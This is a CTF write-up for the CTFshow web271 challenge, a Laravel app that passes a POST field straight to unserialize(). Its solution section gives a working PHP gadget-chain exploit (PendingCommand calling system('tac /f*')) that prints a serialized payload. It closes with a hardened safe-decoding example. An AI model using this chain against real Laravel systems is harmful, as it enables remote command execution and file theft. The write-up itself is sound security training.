CTFshow Deserialization web271
Contents
- Source code
- Approach
- Solution
- Summary
Source code
<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);

$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);

@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

Approach
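The hint in the source header, "Laravel - A PHP Framework For Web Artisans", tells us the application is built on the Laravel framework. The entry script also passes the POST parameter data straight to unserialize(), so this is a Laravel deserialization challenge.
Reference blog post: https://www.jianshu.com/p/5aac92a4949f
Solution
exp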
<?php
namespace Illuminate\Foundation\Testing {
    class PendingCommand
    {
        protected $command;
        protected $parameters;
        protected $app;
        public $test;

        public function __construct($command, $parameters, $class, $app)
        {
            $this->command = $command;
            $this->parameters = $parameters;
            $this->test = $class;
            $this->app = $app;
        }
    }
}

namespace Illuminate\Auth {
    class GenericUser
    {
        protected $attributes;

        public function __construct(array $attributes)
        {
            $this->attributes = $attributes;
        }
    }
}

namespace Illuminate\Foundation {
    class Application
    {
        protected $hasBeenBootstrapped = false;
        protected $bindings;

        public function __construct($bind)
        {
            $this->bindings = $bind;
        }
    }
}

namespace {
    $genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));
    $application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("system",array('tac /f*'),$genericuser,$application);
    echo urlencode(serialize($pendingcommand));
}
?>

Summary
…
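A hardened counterpart to the @unserialize($_POST['data']) line in the challenge source, as an added example that is not part of the original post or of Laravel. DemoGadget, safe_decode() and contains_object() are hypothetical names, and the input strings are constructed samples.

```php
<?php
// Added example: hardened handling of an untrusted "data" field (PHP 7.0+).
// DemoGadget, safe_decode() and contains_object() are hypothetical names.

// Constructed stand-in for any loadable class with a magic method.
class DemoGadget
{
    public static $destructed = 0;
    public $note = '';
    public function __destruct() { self::$destructed++; }
}

// True if the value is, or contains, an object of any kind.
function contains_object($value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Decode untrusted input to scalars/arrays only; null means "rejected".
function safe_decode(string $data)
{
    // allowed_classes => false: objects become __PHP_Incomplete_Class, so no
    // application class is instantiated and no __wakeup()/__destruct() runs.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        return null; // malformed input
    }
    return contains_object($value) ? null : $value;
}

// Constructed sample inputs: a top-level object, a nested object, a plain array.
$object = 'O:10:"DemoGadget":1:{s:4:"note";s:1:"x";}';
$nested = 'a:1:{s:1:"k";' . $object . '}';
$plain  = serialize(['id' => 7]);

var_dump(safe_decode($object), safe_decode($nested), safe_decode($plain));
var_dump(DemoGadget::$destructed); // counts DemoGadget destructor calls
```

Both object-bearing inputs are rejected and the destructor counter stays at zero, while the plain array decodes normally. Where the wire format is yours to choose, json_decode() avoids PHP object deserialization entirely.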